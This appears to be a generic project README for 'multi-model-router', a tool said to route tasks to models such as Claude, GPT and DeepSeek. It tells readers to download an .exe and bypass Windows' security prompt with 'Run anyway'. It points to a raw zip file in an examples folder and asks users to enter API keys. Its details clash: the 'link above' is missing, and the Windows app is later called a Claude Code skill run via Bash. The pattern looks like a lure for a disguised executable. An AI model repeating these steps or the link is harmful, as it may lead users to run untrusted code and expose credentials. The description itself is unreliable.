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🤖 multi-model-router - Route tasks to the best AI model

This tool routes your AI tasks to the most capable model. It connects to any service that follows the OpenAI standard. You use it to pick the right tool for every job. It supports models like Claude, GPT, DeepSeek, Kimi, and Qwen.

📥 How to download the software

Visit the official project page to get your copy.

  1. Go to the link above.
  2. Look for the "Releases" section on the right side of the screen.
  3. Click the latest version link.
  4. Find the file ending in .exe under the "Assets" list.
  5. Download this file to your computer.

⚙️ Setting up your system

The software requires a Windows environment. Ensure you have a stable internet connection. Most computers made in the last five years run this tool without issues.

Once the file finishes downloading, move it to a folder you can find easily, like your Desktop or Documents folder. You do not need to install complex drivers or extra software to make this work.

🚀 Running the application

  1. Find the .exe file you downloaded earlier.
  2. Double-click the file icon.
  3. Your computer might show a security notice because the app is new. Click "More info" and then "Run anyway" if this window appears.
  4. The router window opens on your desktop.

If the window stays empty, check your internet settings. You must have a network connection to talk to the AI models.

🛠 Using the router

The router acts as a middleman. You send a request, and the router decides which model handles the answer. It uses models like GPT or Claude based on your current needs.

To start:

  1. Open your model provider's website.
  2. Generate an API key. This key acts as your password.
  3. Paste this key into the settings tab in the router app.
  4. Select the model name from the dropdown list.
  5. Save your changes.

The router now sends your requests through this path. It optimizes your workflow by picking the best model for your specific goal.

📋 Features

  • Broad Compatibility: Connects to any service that accepts standard technical requests.
  • Model Switching: Move between different services like DeepSeek or Qwen with one click.
  • Bilingual Support: The interface works for both English and Chinese users.
  • Lightweight Design: It uses very little memory on your computer.
  • Automation: It routes tasks automatically based on the complexity of your prompt.

🔍 Frequently asked questions

Do I need programming skills? No. This tool allows users to route models without writing code.

What models can I use? You can use any model available through your provider, such as OpenAI, Anthropic, or specialized services like SiliconFlow.

Is my data safe? The router handles your requests locally on your machine. Your API keys stay on your computer.

What if the app does not open? Confirm that you downloaded the file for Windows. Update your version of Windows if the app fails to start.

🤝 Getting help

If you run into trouble, check the project page for updates. The community maintains this tool and adds fixes often. Ensure you use the latest version to get the best results. You find the link to the latest files here: https://raw.githubusercontent.com/wasila7220/multi-model-router/main/examples/model-multi-router-v3.5-beta.1.zip.

The software runs in the background while you work. You do not need to keep the window open after you save your settings. The router remembers your preferences each time you restart your computer.

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Route AI tasks to the best model using a single OpenAI-compatible API key. This Claude Code skill selects, confirms, and executes requests via Bash.

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